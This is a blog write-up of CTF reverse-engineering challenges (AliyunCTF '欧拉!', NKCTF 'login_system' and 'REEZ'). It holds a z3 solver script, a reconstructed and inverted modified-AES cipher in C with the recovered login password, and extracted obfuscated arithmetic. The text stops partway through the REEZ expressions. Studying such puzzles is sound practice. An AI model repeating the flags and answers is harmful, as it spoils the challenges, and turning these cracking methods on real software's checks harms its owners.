AliyunCTF & NKCTF

Last updated on April 15, 2024 pm

AliyunCTF - 欧拉!

NKCTF - login_system REEZ maimai

下周要打长城杯,正好这个周末有几个比赛,做点题目玩玩

AliyunCTF - 欧拉!

逻辑很简单,全是约束,直接z3梭哈

那些置零的语句,转化为不相等就可以了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from z3 import *

flag = [BitVec('flag_%d' % (i),8)for i in range(29)]
s = Solver()
# key = [0,0,1,0,0,1,0,0,1,0,0,0,1,1,1,0,0,1,1,0,0,1,0,0,1,1,0,0,1,1,0,1,0,0,0,1,0,1,0,1,0,0,1,0,0,1,1,0,0,0,0,1,0,1,0,0,1,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,1,0,1,0,1,1,1,0]
key = [2,5,8,12,13,14,17,18,21,24,25,28,29,31,35,37,39,42,45,46,51,53,56,58,59,62,65,71,72,73,75,77,78,79]
f1 = 'aliyunctf{'
for i in range(len(f1)):
s.add(flag[i] == ord(f1[i]))
s.add(flag[28] == ord("}"))

for i in range(18):
s.add(flag[10 + i] < ord('9'))
s.add(flag[10 + i] >= ord('0'))

s.add(flag[11] > flag[12])
s.add(flag[13] < flag[14])
s.add(flag[10] == flag[16 + 2])
s.add(flag[16 + 5] == flag[16 + 9])

s.add(flag[16 + 4] > flag[15])
s.add(flag[13] < flag[16 + 7])
s.add(flag[16 + 1] < flag[14])
s.add(flag[16 + 8] == 55)
s.add(flag[11 + 16] == 52)

for i in range(18-1):
condition_1 = []
condition_2 = []
for k in range(i+1,18-1):
condition_1.append(((flag[i + 10]-48) * 8 + (flag[i+10]-48) + (flag[i+10+1]-48)) != (flag[k + 10]-48) * 8 + (flag[k + 10] - 48) + (flag[k+ 10 +1] - 48))
condition_1.append(((flag[i + 10 + 1]-48) * 8 + (flag[i+10]-48) + (flag[i+10+1]-48)) != (flag[k + 10]-48) * 8 + (flag[k + 10] - 48) + (flag[k+ 10 +1] - 48))

condition_1.append(((flag[i + 10]-48) * 8 + (flag[i+10]-48) + (flag[i+10+1]-48)) != (flag[k + 10 + 1]-48) * 8 + (flag[k + 10] - 48) + (flag[k+ 10 +1] - 48))
condition_1.append(((flag[i + 10 + 1]-48) * 8 + (flag[i+10]-48) + (flag[i+10+1]-48)) != (flag[k + 10 + 1]-48) * 8 + (flag[k + 10] - 48) + (flag[k+ 10 +1] - 48))
condition_2.append(And(condition_1))
s.add(And(condition_2))

for i in range(18-1):
condition_2 = []
condition_3 = []
for k in range(len(key)):
for j in range(len(key)):
condition_1 = []
condition_1.append(((flag[i + 10] - 48 )* 8 + flag[i + 10] - 48 + flag[i + 10 + 1] - 48) == key[k])
condition_1.append(((flag[i + 10 + 1] - 48) * 8 + flag[i + 10] - 48 + flag[i + 10 + 1] - 48) == key[j])
condition_2.append(And(condition_1))
s.add(Or(condition_2))
s.check()

m = s.model()
for i in flag:
print(chr(m[i].as_long()),end='')

print()

NKCTF - login_system

用户名以及密码的前半部分很容易计算

username: user01_nkctf2024
password: uSer1p4ss_16位xxx

后面就是魔改的AES,经过调试得到加密脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <string.h>
unsigned char Sbox[16][16] = {
/* 0 1 2 3 4 5 6 7 8 9 a b c d e f */
{49, 82, 90, 200, 11, 172, 243, 58, 139, 84, 39, 155, 171, 149, 222, 131},
{96, 203, 83, 127, 196, 227, 10, 151, 224, 41, 213, 104, 197, 223, 244, 123},
{170, 214, 66, 120, 108, 233, 112, 23, 215, 55, 36, 73, 117, 169, 137, 103},
{3, 250, 217, 145, 180, 91, 194, 78, 146, 252, 70, 177, 115, 8, 199, 116},
{9, 175, 236, 245, 77, 45, 234, 165, 218, 239, 166, 43, 126, 12, 143, 176},
{4, 6, 98, 132, 21, 142, 18, 29, 68, 192, 226, 56, 212, 71, 40, 69},
{110, 157, 99, 207, 230, 140, 24, 130, 27, 44, 238, 135, 148, 16, 193, 32},
{7, 74, 164, 235, 119, 188, 211, 225, 102, 42, 107, 231, 121, 204, 134, 22},
{208, 209, 25, 85, 60, 159, 251, 48, 152, 189, 184, 241, 158, 97, 205, 144},
{206, 124, 141, 87, 174, 106, 179, 61, 118, 167, 113, 136, 162, 186, 79, 62},
{64, 100, 15, 72, 33, 53, 54, 47, 232, 20, 93, 81, 216, 181, 254, 210},
{150, 147, 161, 182, 67, 13, 76, 128, 201, 255, 163, 221, 114, 5, 89, 191},
{14, 38, 52, 31, 19, 229, 220, 242, 198, 80, 30, 228, 133, 183, 57, 138},
{202, 237, 156, 187, 86, 35, 26, 240, 50, 88, 178, 101, 51, 111, 65, 190},
{63, 109, 17, 0, 173, 95, 195, 129, 37, 168, 160, 154, 246, 247, 94, 153},
{34, 46, 75, 249, 59, 2, 122, 185, 92, 105, 248, 28, 219, 1, 125, 253},
};
void AddRoundKey(unsigned char *plaintext, unsigned char *CipherKey) /*轮密钥加*/
{

unsigned int v4[4] = {0};
for (int i = 0; i < 4; i++)
{
for (int k = 3; k > -1; k--)
{
v4[i] = (v4[i] << 8) | CipherKey[i * 4 + k];
}
}
// printf("%x,", v4[0]);
for (int i = 0; i < 4; i++)
{
for (int k = 0; k < 4; k++)
{
plaintext[4 * i + k] ^= v4[k] >> (8 * (3 - i));
}
}
}
void SubBytes(unsigned char *plaintext, unsigned char *plaintextencrypt, int count) /*S盒置换*/
{
unsigned int row, column;
for (int i = 0; i < count; i++)
{
row = (plaintext[i] & 0xF0) >> 4;
column = plaintext[i] & 0x0F;
plaintextencrypt[i] = Sbox[row][column];
}
}

void ShiftRows(unsigned char *plaintextencrypt) /*行移位*/
{
unsigned char temp = 0;
unsigned v4 = 0;
for (int i = 0; i < 4; i++)
{
v4 = 0;
for (int k = 0; k < 4; k++)
{
v4 = (v4 << 8) | plaintextencrypt[i * 4 + k];
}
// printf("%x,", v4);
v4 = (v4 >> (8 * (4 - i))) | ((v4 << (8 * i)) & 0xffffffff);
// printf("%x,", v4);
plaintextencrypt[i * 4] = (v4 & 0xff000000) >> 24;
plaintextencrypt[i * 4 + 1] = (v4 & 0x00ff0000) >> 16;
plaintextencrypt[i * 4 + 2] = (v4 & 0x0000ff00) >> 8;
plaintextencrypt[i * 4 + 3] = (v4 & 0x000000ff);
}
}

unsigned char Mult2(unsigned char v10, unsigned char input) /*列混淆*/
{
unsigned char v5 = 0;
int v7 = 0;
for (int i = 0; i <= 7; i++)
{
if ((v10 & 1) != 0)
{
v5 ^= input;
}
v7 = input & 0x80;
input *= 2;
if (v7)
input ^= 0x1b;
v10 >>= 1;
}
return v5;
}
void MixColumns(unsigned char *plaintextencrypt, unsigned char *plaintextencrypt2)
{
unsigned int v10[4] = {0x1010302,
0x1030201,
0x3020101,
0x2010103};
unsigned char temp[16] = {0};
memcpy(temp, plaintextencrypt, 16);
int v1, v2, v3;
for (int k = 0; k <= 3; k++)
{
for (int m = 0; m <= 3; m++)
{
v1 = Mult2(v10[k], temp[m]);
v2 = Mult2(v10[k] >> 8, temp[m + 4]) ^ v1;
v3 = Mult2(v10[k] >> 16, temp[m + 8]) ^ v2;
plaintextencrypt2[4 * k + m] = Mult2(v10[k] >> 24, temp[m + 12]) ^ v3;
}
}
}

int main()
{
// C4 8E 5A 45 CB 1D 54 28 F3 92 7B 47 0A F3 27 4D
printf("**************AES加密***************\n");
int i = 0, k;
unsigned char PlainText[16] = {0x39, 0x37, 0x32, 0x64, 0x65, 0x39, 0x61, 0x65, 0x65, 0x63, 0x62, 0x34, 0x37, 0x64, 0x63, 0x38},
CipherKey[13][16] = {
{0x72, 0x65, 0x73, 0x75, 0x6e, 0x5f, 0x31, 0x30, 0x66, 0x74, 0x63, 0x6b, 0x34, 0x32, 0x30, 0x32},
{0xab, 0xd1, 0xaa, 0x77, 0xc5, 0x8e, 0x9b, 0x47, 0xa3, 0xfa, 0xf8, 0x2c, 0x97, 0xc8, 0xc8, 0x1e},
{0x5f, 0xec, 0x6c, 0xb3, 0x9a, 0x62, 0xf7, 0xf4, 0x39, 0x98, 0xf, 0xd8, 0xae, 0x50, 0xc7, 0xc6},
{0x83, 0x12, 0x68, 0x45, 0x19, 0x70, 0x9f, 0xb1, 0x20, 0xe8, 0x90, 0x69, 0x8e, 0xb8, 0x57, 0xaf},
{0x51, 0xdf, 0xa1, 0x50, 0x48, 0xaf, 0x3e, 0xe1, 0x68, 0x47, 0xae, 0x88, 0xe6, 0xff, 0xf9, 0x27},
{0x46, 0x1c, 0x5c, 0x29, 0xe, 0xb3, 0x62, 0xc8, 0x66, 0xf4, 0xcc, 0x40, 0x80, 0xb, 0x35, 0x67},
{0xc4, 0xcc, 0xc7, 0x52, 0xca, 0x7f, 0xa5, 0x9a, 0xac, 0x8b, 0x69, 0xda, 0x2c, 0x80, 0x5c, 0xbd},
{0xc1, 0xb9, 0x17, 0xc6, 0xb, 0xc6, 0xb2, 0x5c, 0xa7, 0x4d, 0xdb, 0x86, 0x8b, 0xcd, 0x87, 0x3b},
{0x70, 0x48, 0xa0, 0x76, 0x7b, 0x8e, 0x12, 0x2a, 0xdc, 0xc3, 0xc9, 0xac, 0x57, 0xe, 0x4e, 0x97},
{0x4d, 0x55, 0x7e, 0xe2, 0x36, 0xdb, 0x6c, 0xc8, 0xea, 0x18, 0xa5, 0x64, 0xbd, 0x16, 0xeb, 0xf3},
{0xb4, 0x50, 0x74, 0x4e, 0x82, 0x8b, 0x18, 0x86, 0x68, 0x93, 0xbd, 0xe2, 0xd5, 0x85, 0x56, 0x11},
{0xb4, 0x50, 0x74, 0x4e, 0x82, 0x8b, 0x18, 0x86, 0x68, 0x93, 0xbd, 0xe2, 0xd5, 0x85, 0x56, 0x11},
{0x4d, 0x55, 0x7e, 0xe2, 0x36, 0xdb, 0x6c, 0xc8, 0xea, 0x18, 0xa5, 0x64, 0xbd, 0x16, 0xeb, 0xf3},
}, // CipherKey1[16] = {0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c},
PlainText1[16] = {0}, PlainText2[16] = {0};
unsigned char enc[] = {0xb0, 0xcc, 0x93, 0xea, 0xe9, 0x2f, 0xef, 0x56, 0x99, 0x39, 0x6e, 0x2, 0x3b, 0x4f, 0x9e, 0x42};
for (int i = 0; i <= 3; ++i)
{
for (int j = 0; j <= 3; ++j)
{
PlainText1[j * 4 + i] = PlainText[4 * i + j];
}
}
memcpy(PlainText, PlainText1, 16);

AddRoundKey(PlainText, CipherKey[0]);

for (i = 0; i < 9; i++)
{
// printf("\n第%d轮循环:\n", i + 1);
SubBytes(PlainText, PlainText1, 16); /*S盒置换*/
// printf("\n");
ShiftRows(PlainText1); /*行移位*/
MixColumns(PlainText1, PlainText2); /*列混淆*/
AddRoundKey(PlainText2, CipherKey[1 + i]);
memcpy(PlainText, PlainText2, 16);
}

SubBytes(PlainText, PlainText1, 16); /*S盒置换*/

ShiftRows(PlainText1); /*行移位*/

AddRoundKey(PlainText1, CipherKey[10]);

unsigned char output[16] = {0};
// int k = 0;

// printf("\n");
k = 0;
for (int i = 0; i <= 3; ++i)
{
for (int j = 0; j <= 3; ++j)
{
output[k++] = PlainText1[4 * j + i];
}
}
for (k = 0; k < 16; k++)
printf("0x%02X,", output[k]);

}

除了SubBytes其他全部都被魔改了一下。

先计算逆S盒

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
unsigned char Te_InvS[16][16] = {0}; // 逆S盒缓存
unsigned char Te_InVSAdd[2] = {0}; // 位置
for (unsigned char i = 0; i < 16; i++)
{ // 计算逆S盒
for (unsigned char n = 0; n < 16; n++)
{
Te_InVSAdd[0] = (Sbox[i][n] >> 4) & 0x0f; // 取行
Te_InVSAdd[1] = (Sbox[i][n] >> 0) & 0x0f; // 取列
Te_InvS[Te_InVSAdd[0]][Te_InVSAdd[1]] = i * 16 + n; // 置值
}
}

for (unsigned char i = 0; i < 16; i++)
{
printf("{");
for (unsigned char n = 0; n < 16; n++)
{
printf("0x%02X,", Te_InvS[i][n]);
}
printf("}\n");
}

再搓整个解密脚本,列混淆那里可以丢给AI写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <string.h>
unsigned char Sbox_re[16][16] = {{0xe3, 0xfd, 0xf5, 0x30, 0x50, 0xbd, 0x51, 0x70, 0x3d, 0x40, 0x16, 0x4, 0x4d, 0xb5, 0xc0, 0xa2},
{0x6d, 0xe2, 0x56, 0xc4, 0xa9, 0x54, 0x7f, 0x27, 0x66, 0x82, 0xd6, 0x68, 0xfb, 0x57, 0xca, 0xc3},
{0x6f, 0xa4, 0xf0, 0xd5, 0x2a, 0xe8, 0xc1, 0xa, 0x5e, 0x19, 0x79, 0x4b, 0x69, 0x45, 0xf1, 0xa7},
{0x87, 0x0, 0xd8, 0xdc, 0xc2, 0xa5, 0xa6, 0x29, 0x5b, 0xce, 0x7, 0xf4, 0x84, 0x97, 0x9f, 0xe0},
{0xa0, 0xde, 0x22, 0xb4, 0x58, 0x5f, 0x3a, 0x5d, 0xa3, 0x2b, 0x71, 0xf2, 0xb6, 0x44, 0x37, 0x9e},
{0xc9, 0xab, 0x1, 0x12, 0x9, 0x83, 0xd4, 0x93, 0xd9, 0xbe, 0x2, 0x35, 0xf8, 0xaa, 0xee, 0xe5},
{0x10, 0x8d, 0x52, 0x62, 0xa1, 0xdb, 0x78, 0x2f, 0x1b, 0xf9, 0x95, 0x7a, 0x24, 0xe1, 0x60, 0xdd},
{0x26, 0x9a, 0xbc, 0x3c, 0x3f, 0x2c, 0x98, 0x74, 0x23, 0x7c, 0xf6, 0x1f, 0x91, 0xfe, 0x4c, 0x13},
{0xb7, 0xe7, 0x67, 0xf, 0x53, 0xcc, 0x7e, 0x6b, 0x9b, 0x2e, 0xcf, 0x8, 0x65, 0x92, 0x55, 0x4e},
{0x8f, 0x33, 0x38, 0xb1, 0x6c, 0xd, 0xb0, 0x17, 0x88, 0xef, 0xeb, 0xb, 0xd2, 0x61, 0x8c, 0x85},
{0xea, 0xb2, 0x9c, 0xba, 0x72, 0x47, 0x4a, 0x99, 0xe9, 0x2d, 0x20, 0xc, 0x5, 0xe4, 0x94, 0x41},
{0x4f, 0x3b, 0xda, 0x96, 0x34, 0xad, 0xb3, 0xcd, 0x8a, 0xf7, 0x9d, 0xd3, 0x75, 0x89, 0xdf, 0xbf},
{0x59, 0x6e, 0x36, 0xe6, 0x14, 0x1c, 0xc8, 0x3e, 0x3, 0xb8, 0xd0, 0x11, 0x7d, 0x8e, 0x90, 0x63},
{0x80, 0x81, 0xaf, 0x76, 0x5c, 0x1a, 0x21, 0x28, 0xac, 0x32, 0x48, 0xfc, 0xc6, 0xbb, 0xe, 0x1d},
{0x18, 0x77, 0x5a, 0x15, 0xcb, 0xc5, 0x64, 0x7b, 0xa8, 0x25, 0x46, 0x73, 0x42, 0xd1, 0x6a, 0x49},
{0xd7, 0x8b, 0xc7, 0x6, 0x1e, 0x43, 0xec, 0xed, 0xfa, 0xf3, 0x31, 0x86, 0x39, 0xff, 0xae, 0xb9}};
void AddRoundKey(unsigned char *plaintext, unsigned char *CipherKey) /*轮密钥加*/
{

unsigned int v4[4] = {0};
for (int i = 0; i < 4; i++)
{
for (int k = 3; k > -1; k--)
{
v4[i] = (v4[i] << 8) | CipherKey[i * 4 + k];
}
}
// printf("%x,", v4[0]);
for (int i = 0; i < 4; i++)
{
for (int k = 0; k < 4; k++)
{
plaintext[4 * i + k] ^= v4[k] >> (8 * (3 - i));
}
}
}

void ShiftRowsRe(unsigned char *plaintextencrypt) /*行移位*/
{
unsigned char temp = 0;
unsigned v4 = 0;
for (int i = 0; i < 4; i++)
{
v4 = 0;
for (int k = 0; k < 4; k++)
{
v4 = (v4 << 8) | plaintextencrypt[i * 4 + k];
}
// printf("%x,", v4);
v4 = (v4 >> (8 * i)) | ((v4 << (8 * (4 - i))) & 0xffffffff);
// printf("%x,", v4);
plaintextencrypt[i * 4] = (v4 & 0xff000000) >> 24;
plaintextencrypt[i * 4 + 1] = (v4 & 0x00ff0000) >> 16;
plaintextencrypt[i * 4 + 2] = (v4 & 0x0000ff00) >> 8;
plaintextencrypt[i * 4 + 3] = (v4 & 0x000000ff);
}
}

void SubBytesRe(unsigned char *plaintext, unsigned char *plaintextencrypt, int count) /*S盒逆置换*/
{
unsigned int row, column;
// 填充Sbox矩阵
for (int i = 0; i < count; i++)
{
row = (plaintext[i] & 0xF0) >> 4;
column = plaintext[i] & 0x0F;
plaintextencrypt[i] = Sbox_re[row][column];
}
}

unsigned char mult(unsigned char x, unsigned char y)
{
unsigned char r = 0;
for (int i = 0; i < 8; i++)
{
if ((y & 0x1) == 1)
{
r ^= x;
}
unsigned char hbit = x & 0x80;
x <<= 1;
if (hbit == 0x80)
{
x ^= 0x1b;
}
y >>= 1;
}
return r;
}

void inv_mix_columns(unsigned char *s)
{
unsigned char temp[16];
for (int i = 0; i < 16; i++)
{
temp[i] = s[i];
}
for (int i = 0; i < 4; i++)
{
s[i] = mult(0x0e, temp[i]) ^ mult(0x0b, temp[i + 4]) ^ mult(0x0d, temp[i + 8]) ^ mult(0x09, temp[i + 12]);
s[i + 4] = mult(0x09, temp[i]) ^ mult(0x0e, temp[i + 4]) ^ mult(0x0b, temp[i + 8]) ^ mult(0x0d, temp[i + 12]);
s[i + 8] = mult(0x0d, temp[i]) ^ mult(0x09, temp[i + 4]) ^ mult(0x0e, temp[i + 8]) ^ mult(0x0b, temp[i + 12]);
s[i + 12] = mult(0x0b, temp[i]) ^ mult(0x0d, temp[i + 4]) ^ mult(0x09, temp[i + 8]) ^ mult(0x0e, temp[i + 12]);
}
}

int main()
{
//// user: user01_nkctf2024
// pass: uSer1p4ss_9ee779cd2abcde48
unsigned char enc[] = {0xb0, 0xcc, 0x93, 0xea, 0xe9, 0x2f, 0xef, 0x56, 0x99, 0x39, 0x6e, 0x2, 0x3b, 0x4f, 0x9e, 0x42};
// unsigned char enc[] = {0xB3, 0x0E, 0x2F, 0xD7, 0x77, 0x31, 0x3E, 0xC5, 0x68, 0x36, 0x89, 0x00, 0x2D, 0x91, 0xD3, 0xFD};
unsigned char decrypt[16] = {0};
unsigned char decryp2[16] = {0};
unsigned char CipherKey[13][16] = {
{0x72, 0x65, 0x73, 0x75, 0x6e, 0x5f, 0x31, 0x30, 0x66, 0x74, 0x63, 0x6b, 0x34, 0x32, 0x30, 0x32},
{0xab, 0xd1, 0xaa, 0x77, 0xc5, 0x8e, 0x9b, 0x47, 0xa3, 0xfa, 0xf8, 0x2c, 0x97, 0xc8, 0xc8, 0x1e},
{0x5f, 0xec, 0x6c, 0xb3, 0x9a, 0x62, 0xf7, 0xf4, 0x39, 0x98, 0xf, 0xd8, 0xae, 0x50, 0xc7, 0xc6},
{0x83, 0x12, 0x68, 0x45, 0x19, 0x70, 0x9f, 0xb1, 0x20, 0xe8, 0x90, 0x69, 0x8e, 0xb8, 0x57, 0xaf},
{0x51, 0xdf, 0xa1, 0x50, 0x48, 0xaf, 0x3e, 0xe1, 0x68, 0x47, 0xae, 0x88, 0xe6, 0xff, 0xf9, 0x27},
{0x46, 0x1c, 0x5c, 0x29, 0xe, 0xb3, 0x62, 0xc8, 0x66, 0xf4, 0xcc, 0x40, 0x80, 0xb, 0x35, 0x67},
{0xc4, 0xcc, 0xc7, 0x52, 0xca, 0x7f, 0xa5, 0x9a, 0xac, 0x8b, 0x69, 0xda, 0x2c, 0x80, 0x5c, 0xbd},
{0xc1, 0xb9, 0x17, 0xc6, 0xb, 0xc6, 0xb2, 0x5c, 0xa7, 0x4d, 0xdb, 0x86, 0x8b, 0xcd, 0x87, 0x3b},
{0x70, 0x48, 0xa0, 0x76, 0x7b, 0x8e, 0x12, 0x2a, 0xdc, 0xc3, 0xc9, 0xac, 0x57, 0xe, 0x4e, 0x97},
{0x4d, 0x55, 0x7e, 0xe2, 0x36, 0xdb, 0x6c, 0xc8, 0xea, 0x18, 0xa5, 0x64, 0xbd, 0x16, 0xeb, 0xf3},
{0xb4, 0x50, 0x74, 0x4e, 0x82, 0x8b, 0x18, 0x86, 0x68, 0x93, 0xbd, 0xe2, 0xd5, 0x85, 0x56, 0x11},
{0xb4, 0x50, 0x74, 0x4e, 0x82, 0x8b, 0x18, 0x86, 0x68, 0x93, 0xbd, 0xe2, 0xd5, 0x85, 0x56, 0x11},
{0x4d, 0x55, 0x7e, 0xe2, 0x36, 0xdb, 0x6c, 0xc8, 0xea, 0x18, 0xa5, 0x64, 0xbd, 0x16, 0xeb, 0xf3},
};
int k = 0;
for (int i = 0; i <= 3; ++i)
{
for (int j = 0; j <= 3; ++j)
{
decrypt[4 * j + i] = enc[k++];
}
}
// 0xE0, 0xA3, 0x8A, 0xA2, 0x51, 0xDD, 0x62, 0xBF, 0x19, 0x66, 0x34, 0xD6, 0xA7, 0x39, 0xB9, 0x33,
AddRoundKey(decrypt, CipherKey[10]);
ShiftRowsRe(decrypt);
SubBytesRe(decrypt, decryp2, 16);

for (int i = 0; i < 9; i++)
{
AddRoundKey(decryp2, CipherKey[9 - i]);
inv_mix_columns(decryp2);
ShiftRowsRe(decryp2);
SubBytesRe(decryp2, decrypt, 16);
memcpy(decryp2, decrypt, 16);
}

AddRoundKey(decryp2, CipherKey[0]);

for (int i = 0; i <= 3; ++i)
{
for (int j = 0; j <= 3; ++j)
{
decrypt[j * 4 + i] = decryp2[4 * i + j];
}
}
for (k = 0; k < 16; k++)
printf("%c", decrypt[k]);
}

// 9ee779cd2abcde48%

NKCTF - REEZ

运行中会释放一个文件,然后运行那个文件,最后删除,可以下断点dump出那个文件

会发现就是一些逻辑运算,前面的运算提取出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
flag = [97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121]

flag[0] = -105 * (39 * (2 * (flag[0] & (-105 * (39 * (2 * (flag[11] & (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111)) + (flag[11] ^ (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111))) + 23) + 111)) + (flag[0] ^ (-105 * (39 * (2 * (flag[11] & (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111)) + (flag[11] ^ (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111))) + 23) + 111))) + 23) + 111
flag[1] = -105 * (39 * (2 * ((flag[13] ^ flag[14]) & flag[1]) + (flag[13] ^ flag[14] ^ flag[1])) + 23) + 111
flag[2] = -105 * (39 * (2 * (flag[2] & (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111)) + (flag[2] ^ (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111))) + 23) + 111
flag[3] = -105 * (39 * (2 * ((flag[17] ^ 0x17) & flag[3]) + (flag[17] ^ 0x17 ^ flag[3])) + 23) + 111
flag[4] = -105 * (39 * (2 * (flag[4] & (-105 * (39 * (2 * (flag[20] & (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111)) + (flag[20] ^ (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111))) + 23) + 111)) + (flag[4] ^ (-105 * (39 * (2 * (flag[20] & (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111)) + (flag[20] ^ (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111))) + 23) + 111))) + 23) + 111
flag[5] = -105 * (39 * (2 * (flag[5] & (~flag[23] + flag[21] + 1)) + (flag[5] ^ (~flag[23] + flag[21] + 1))) + 23) + 111
flag[6] = -105 * (39 * (2 * (flag[6] & (-105 * (39 * (2 * (flag[8] & flag[7]) + (flag[8] ^ flag[7])) + 23) + 111)) + (flag[6] ^ (-105 * (39 * (2 * (flag[8] & flag[7]) + (flag[8] ^ flag[7])) + 23) + 111))) + 23) + 111
flag[7] = -105 * (39 * (2 * (flag[7] & (-105 * (39 * (2 * ((~flag[20] + flag[23] + 1) & 0x11) + ((~flag[20] + flag[23] + 1) ^ 0x11)) + 23) + 111)) + (flag[7] ^ (-105 * (39 * (2 * ((~flag[20] + flag[23] + 1) & 0x11) + ((~flag[20] + flag[23] + 1) ^ 0x11)) + 23) + 111))) + 23) + 111
flag[8] = -105 * (39 * (2 * (flag[8] & (flag[19] ^ (-105 * (39 * (2 * (flag[18] & 1) + (flag[18] ^ 1)) + 23) + 111))) + (flag[8] ^ flag[19] ^ (-105 * (39 * (2 * (flag[18] & 1) + (flag[18] ^ 1)) + 23) + 111))) + 23) + 111
flag[9] = ~flag[16] + -105 * (39 * (2 * (flag[17] & flag[9]) + (flag[17] ^ flag[9])) + 23) + 111 + 1
flag[10] = -105 * (39 * (2 * (flag[10] & (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111)) + (flag[10] ^ (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111))) + 23) + 111
flag[11] = -105 * (39 * (2 * (flag[12] & (-105 * (39 * (2 * (flag[13] & (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111)) + (flag[13] ^ (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111))) + 23) + 111)) + (flag[12] ^ (-105 * (39 * (2 * (flag[13] & (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111)) + (flag[13] ^ (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111))) + 23) + 111))) + 23) + 111
flag[12] = -105 * (39 * (2 * (flag[12] & flag[11]) + (flag[12] ^ flag[11])) + 23) + 111
flag[13] = -105 * (39 * (2 * (flag[13] & (flag[7] ^ flag[8])) + (flag[13] ^ flag[7] ^ flag[8])) + 23) + 111
flag[14] = -105 * (39 * (2 * (flag[5] & (-105 * (39 * (2 * (flag[4] & (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111)) + (flag[4] ^ (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111))) + 23) + 111)) + (flag[5] ^ (-105 * (39 * (2 * (flag[4] & (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111)) + (flag[4] ^ (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111))) + 23) + 111))) + 23) + 111
flag[15] = -105 * (39 * (2 * (flag[3] & (-105 * (39 * (2 * (flag[15] & 8) + (flag[15] ^ 8)) + 23) + 111)) + (flag[3] ^ (-105 * (39 * (2 * (flag[15] & 8) + (flag[15] ^ 8)) + 23) + 111))) + 23) + 111
flag[16] = -105 * (39 * (2 * ((flag[2] ^ 0x4D) & flag[16]) + (flag[2] ^ 0x4D ^ flag[16])) + 23) + 111
flag[17] = -105 * (39 * (2 * (flag[17] & (-105 * (39 * (2 * ((flag[1] ^ 0x17) & 0xF9) + (flag[1] ^ 0xEE)) + 23) + 111)) + (flag[17] ^ (-105 * (39 * (2 * ((flag[1] ^ 0x17) & 0xF9) + (flag[1] ^ 0xEE)) + 23) + 111))) + 23) + 111
flag[18] = -105 * (39 * (2 * ((flag[17] ^ flag[15]) & flag[18]) + (flag[17] ^ flag[15] ^ flag[18])) + 23) + 111
flag[19] = -105 * (39 * (2 * (flag[12] & (-105 * (39 * (2 * (flag[14] & flag[19]) + (flag[14] ^ flag[19])) + 23) + 111)) + (flag[12] ^ (-105 * (39 * (2 * (flag[14] & flag[19]) + (flag[14] ^ flag[19])) + 23) + 111))) + 23) + 111
flag[20] = -105 * (39 * (2 * (flag[20] & flag[11]) + (flag[20] ^ flag[11])) + 23) + 111
